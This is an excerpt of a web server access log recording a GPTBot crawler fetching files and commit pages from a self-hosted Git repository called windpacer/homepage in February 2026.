"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" +[17/Feb/2026:13:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" [Client 74.7.227.38] [Length 11443] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 74.7.227.38] [Length 10727] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" +[17/Feb/2026:13:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/halfweekly" [Client 74.7.227.38] [Length 8387] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:13:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 74.7.227.38] [Length 12588] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" [Client 74.7.227.38] [Length 11578] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" +[17/Feb/2026:13:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11212] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" +[17/Feb/2026:13:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" +[17/Feb/2026:13:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" +[17/Feb/2026:13:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10381] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" +[17/Feb/2026:13:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" +[17/Feb/2026:13:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" +[17/Feb/2026:13:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" [Client 74.7.227.38] [Length 14250] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" +[17/Feb/2026:13:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 74.7.227.38] [Length 14389] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" +[17/Feb/2026:13:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 74.7.227.38] [Length 12805] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" +[17/Feb/2026:13:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 74.7.227.38] [Length 10316] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" +[17/Feb/2026:13:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 74.7.227.38] [Length 13001] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" +[17/Feb/2026:13:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" +[17/Feb/2026:13:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" [Client 74.7.227.38] [Length 10763] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" +[17/Feb/2026:13:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" +[17/Feb/2026:13:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11655] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13178] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" +[17/Feb/2026:13:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 196599] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11962] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" +[17/Feb/2026:13:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11648] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 74.7.227.38] [Length 11341] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 74.7.227.38] [Length 13281] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" +[17/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" +[17/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12783] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" +[17/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" [Client 74.7.227.38] [Length 10603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" +[17/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" +[17/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" +[17/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" +[17/Feb/2026:13:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10859] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" +[17/Feb/2026:13:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10805] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" +[17/Feb/2026:13:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" +[17/Feb/2026:13:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12480] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" +[17/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" +[17/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10758] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" +[17/Feb/2026:13:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" +[17/Feb/2026:13:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 74.7.227.38] [Length 10980] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" +[17/Feb/2026:13:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" [Client 74.7.227.38] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" +[17/Feb/2026:13:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13901] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" +[17/Feb/2026:13:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" +[17/Feb/2026:13:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" +[17/Feb/2026:13:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr 